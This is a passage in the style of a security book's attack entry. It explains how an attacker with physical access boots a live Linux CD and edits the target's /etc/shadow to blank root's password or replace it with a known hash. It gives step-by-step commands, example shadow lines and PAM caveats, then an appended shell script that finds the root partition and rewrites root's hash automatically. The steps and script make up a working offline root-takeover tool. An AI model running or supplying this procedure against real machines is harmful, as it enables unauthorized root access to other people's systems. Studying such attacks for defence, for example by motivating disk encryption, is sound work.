Stealing Changing Data Using a Bootable Linux CD

Popularity: 7
Simplicity: 9
Impact: 10
Risk Rating: 9

Once an attacker has gained physical access, getting into a box can be as simple as booting a CD-based Linux distribution, clearing the root password hash in the installed system's /etc/shadow file (or replacing it with the hash of a known password), and rebooting into the installed system, normally with full access. The only real obstacle is full-disk encryption: an encrypted root partition cannot be mounted and edited this way without the passphrase. The attack proceeds step by step as follows:

1. Reboot the system and configure it to boot from the CD-ROM.

2. Boot the system into the bootable Linux distribution, such as one of the following:

• Backtrack2 (http://www.remote-exploit.org/backtrack_download.html)

• Knoppix-STD (http://s-t-d.org/download.html)

3. Open a root command shell.

4. Create a mount point by typing mkdir mountpoint, which creates a directory called mountpoint. This is where the target's file system will be mounted.

5. Determine how the disks are named. On the kernels these live CDs ship, SCSI (and SATA) drives appear as sda, sdb, sdc, and so on, whereas IDE drives appear as hda, hdb, hdc, and so on. Current kernels name IDE and SATA disks alike as sda, sdb, and so on, and NVMe disks as nvme0n1, nvme1n1, and so on. To list them, type fdisk -l (or lsblk, where available) or look through the output of the dmesg command. Sometimes you'll need to try several approaches.

6. Determine the partition on the disk to be mounted. Partitions are numbered sda1, sda2, sda3, and so on, for sd devices, hda1, hda2, hda3, and so on, for IDE drives, and nvme0n1p1, nvme0n1p2, and so on, for NVMe. The partition that contains /etc/shadow is the root ("/") partition; identifying it can be trial and error, especially if numerous partitions exist on the system, but it is usually one of the first three partitions. A quick check is to mount a candidate read-only and look for etc/shadow under the mount point.

7. Type mount /dev/sda# mountpoint, where /dev/sda# is your root partition (sda1, sda2, sda3, ...) and mountpoint is the directory you created.

8. Change to the /etc directory on the mounted root partition by typing cd mountpoint/etc.

9. Use your favorite text editor (such as vi) to open the shadow file in that directory (mountpoint/etc/shadow, not the live CD's own /etc/shadow) for editing.

10. Scroll down to the line containing the root's information, which looks something like:

root:qDlrwz/E8RSKw:13659:0:99999:7:::

11. Delete everything between the first and second colons, so the line resembles this one:

root::13659:0:99999:7:::

Whether a blank password field actually lets you log in depends on the target's PAM configuration, not on its password-complexity rules (those are enforced only when a password is being set). If pam_unix is configured without nullok, or you are connecting over SSH with PermitEmptyPasswords no, an empty field is rejected at login. In that case, instead of blanking the field, paste in the hash of a password you know, generated in a format the target's crypt(3) accepts (for example, openssl passwd -6 on OpenSSL 1.1.1 or later produces a SHA-512 crypt hash, recognizable by its $6$ prefix), in place of the old root hash.

12. Save the file and exit your editor.

13. Type cd to return to the home directory.

14. Type umount mountpoint to unmount the target file system.

15. Type reboot, and remove the bootable Linux CD from the drive as the system restarts so that it boots from the hard disk.

16. The system can now be accessed as root with no password (or with the known password).
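Steps 4 through 14 as a script, added here as an example and not taken from the original text. It assumes a live CD with a root shell that provides mount, awk, mktemp and openssl (1.1.1 or later, for passwd -6); the mount point /mnt/target and the password Kn0wnP@ss1 are illustrative. The probing and main routines need root and real disks; set_shadow_hash works on any copy of a shadow file, and reproduces both the blank-field variant of step 11 (pass an empty hash) and the known-password variant.

```shell
#!/bin/sh
# Added example: offline reset of root's password hash from a live CD.
# Not from the original page. Assumes mount, awk, mktemp, openssl >= 1.1.1.
set -eu

# find_root_partition MOUNTPOINT
# Probe each partition read-only and print the first one that carries
# etc/shadow, i.e. the root ("/") filesystem. Needs root to mount.
find_root_partition() {
    mp=$1
    for dev in /dev/sd[a-z][0-9]* /dev/hd[a-z][0-9]* /dev/nvme[0-9]n[0-9]p[0-9]*; do
        [ -b "$dev" ] || continue
        if mount -o ro "$dev" "$mp" 2>/dev/null; then
            if [ -f "$mp/etc/shadow" ]; then
                umount "$mp"
                printf '%s\n' "$dev"
                return 0
            fi
            umount "$mp"
        fi
    done
    return 1
}

# shadow_hash SHADOWFILE USER
# Print the hash field (second colon-separated field) of USER's entry.
shadow_hash() {
    awk -F: -v u="$2" '$1 == u { print $2 }' "$1"
}

# set_shadow_hash SHADOWFILE USER HASH
# Replace only the hash field of USER's line; all other lines and fields
# are kept. An empty HASH blanks the field (step 11); a crypt hash sets a
# known password. Crypt hashes contain no backslashes, so awk -v is safe.
set_shadow_hash() {
    file=$1 user=$2 newhash=$3
    tmp=$(mktemp "$file.XXXXXX")
    awk -F: -v OFS=: -v u="$user" -v h="$newhash" \
        '$1 == u { $2 = h } { print }' "$file" > "$tmp"
    cat "$tmp" > "$file"   # write through the existing inode: mode/owner survive
    rm -f "$tmp"
}

# make_hash PASSWORD
# SHA-512 crypt hash ($6$...) with a random salt, accepted by glibc crypt(3).
make_hash() {
    openssl passwd -6 "$1"
}

# main [MOUNTPOINT] [PASSWORD]: the whole procedure, run as root on the live CD.
main() {
    mp=${1:-/mnt/target} pw=${2:-Kn0wnP@ss1}
    mkdir -p "$mp"
    dev=$(find_root_partition "$mp") || { echo "no partition with etc/shadow found" >&2; return 1; }
    mount "$dev" "$mp"
    echo "old root hash: $(shadow_hash "$mp/etc/shadow" root)"
    set_shadow_hash "$mp/etc/shadow" root "$(make_hash "$pw")"
    echo "new root hash: $(shadow_hash "$mp/etc/shadow" root)"
    umount "$mp"
}

# Touch real disks only when invoked as: sh reset-root.sh --run [mountpoint] [password]
if [ "${1-}" = "--run" ]; then
    shift
    main "${1-}" "${2-}"
fi
```

Run it with --run from the live CD's root shell; after the reboot, root accepts the chosen password. Writing the result back through cat rather than mv keeps shadow's restrictive mode and ownership, which a freshly created temp file would not have.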
